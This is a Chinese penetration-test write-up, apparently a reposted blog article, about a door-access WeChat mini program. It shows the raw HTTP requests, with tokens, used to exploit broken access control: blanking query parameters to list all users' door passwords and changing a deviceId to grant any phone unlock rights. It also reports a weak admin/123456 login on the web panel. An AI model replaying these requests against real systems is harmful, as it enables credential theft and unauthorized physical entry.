某微信小程序未授权漏洞挖掘(置空查询思路)
2024-1-22 22:49:24 Author: mp.weixin.qq.com(查看原文) 阅读量:41 收藏

01

原创说明

本篇文章为苏木师傅实战案例分享

02

渗透记录

微信小程序xxx,点击门卡-点击添加密码-截获数据包查看返回包可查看密码,可越权授权如何手机号开门权限

03

未授权一

删除userid和bind数值可查看全部用户密码

数据包:

GET/prod-api/nfc/device/list?userId=&isBind= HTTP/1.1Host:XXX.XXX.cnXweb_xhr:1Authorization:eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImUwMGY0YTY0LTNjZDctNDc1Zi1iN2NlLTc5ZDcwYWY3MjNjYyJ9.1LwhfaSNs34yL9mnACRLkviTL5NzbLCQwpv_jd0bjrsFcoFhMVsO7AD9C-K3jl83VA7RC5X_p53vCW4ZeWsqEQUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090819) XWEB/8531Content-Type:application/jsonAccept:*/*Sec-Fetch-Site:cross-siteSec-Fetch-Mode:corsSec-Fetch-Dest:emptyReferer:https://servicewechat.com/wx473f7c96d0986720/37/page-frame.htmlAccept-Encoding:gzip, deflateAccept-Language:zh-CN,zh;q=0.9Connection:close

04

未授权二

可查看自己的密码

删除deviceid、ismin、status值后可查看所有用户密码

数据包:

GET/prod-api/fy/cardkey/list?deviceId=&isMain=&status= HTTP/1.1Host:XXX.XXX.cnXweb_xhr:1Authorization:eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImUwMGY0YTY0LTNjZDctNDc1Zi1iN2NlLTc5ZDcwYWY3MjNjYyJ9.1LwhfaSNs34yL9mnACRLkviTL5NzbLCQwpv_jd0bjrsFcoFhMVsO7AD9C-K3jl83VA7RC5X_p53vCW4ZeWsqEQUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090819) XWEB/8531Content-Type:application/jsonAccept:*/*Sec-Fetch-Site:cross-siteSec-Fetch-Mode:corsSec-Fetch-Dest:emptyReferer:https://servicewechat.com/wx473f7c96d0986720/37/page-frame.htmlAccept-Encoding:gzip, deflateAccept-Language:zh-CN,zh;q=0.9Connection:close

05

未授权三

数据包:

POST /prod-api/fy/cardkey HTTP/1.1Host: xxx.xxx.cnContent-Length: 131Xweb_xhr: 1Authorization: eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImJiMDIxZjZmLTZmY2UtNDRmOS04M2FlLTBkZmMxZDEyZTZlNiJ9.ndIZOlqG9vXCvb2EBc5efx14tz3VtED_uRrFrCS-FhyBNY4MQTdu08ZVU6QfrrACGmuH_eZbr_uRfWBsEVXT6gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090819) XWEB/8531Content-Type: application/jsonAccept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://servicewechat.com/wx473f7c96d0986720/37/page-frame.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"deviceId":"758","passType":"4","password":"978949","endData":0,"phone":"18888888888","startTime":"2024-01-19 09:00","endTime":""}

通过修改deviceId值可在任何账号中为指定手机授权开锁权限

06

弱口令

小程序看完了,看看web,运气不错弱口令进去了是若依系统,但可惜的是里面没有历史漏洞

Url:https://XXX.XXX.cn/

账号:admin

密码:123456

如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

往期回顾

xss研究笔记

SSRF研究笔记

dom-xss精选文章

2022年度精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips


文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247493356&idx=1&sn=713762a960605cfa851ac6016d4b1ffa&chksm=e8a5ec8fdfd26599f40863bea38e224e26d198c43c22a37955f024c6383956eb8f42c5342de9&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh